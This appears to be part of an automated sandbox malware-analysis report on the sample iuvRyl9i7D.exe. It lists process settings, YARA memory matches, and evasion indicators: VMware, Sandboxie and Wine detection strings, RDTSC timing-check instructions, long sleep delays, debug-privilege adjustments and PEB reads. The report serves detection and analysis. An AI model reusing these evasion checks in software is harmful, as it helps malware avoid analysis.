          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: 0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: iuvRyl9i7D.exe PID: 4928, type: MEMORYSTR
          Source: iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeRDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeRDTSC instruction interceptor: First address: 0000000000408F9E second address: 0000000000408FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000000608C04 second address: 0000000000608C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000000608F9E second address: 0000000000608FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exe TID: 3608Thread sleep time: -45733s >= -30000s
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exe TID: 6208Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6788Thread sleep time: -12912720851596678s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 6500Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_00408ED0 rdtsc
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7432
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1085
          Source: C:\Windows\SysWOW64\control.exeAPI coverage: 9.2 %
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_00611660 FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_00611659 FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeThread delayed: delay time: 45733
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000012.00000000.343652210.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000012.00000000.329987427.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000012.00000000.306952519.0000000005EAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000012.00000000.306066644.0000000005134000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000012.00000000.328239618.00000000051F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000012.00000000.329987427.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
          Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000012.00000000.306066644.0000000005134000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000012.00000000.329987427.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_00408ED0 rdtsc
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0467C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0467C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04623D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04663540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04693D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04607D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0466A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04614D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04614D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04614D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04698DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04611DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04611DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04611DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0469FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04618E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04628EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0469FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0467FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460F716 mov eax, dword ptr fs:[00000030h]
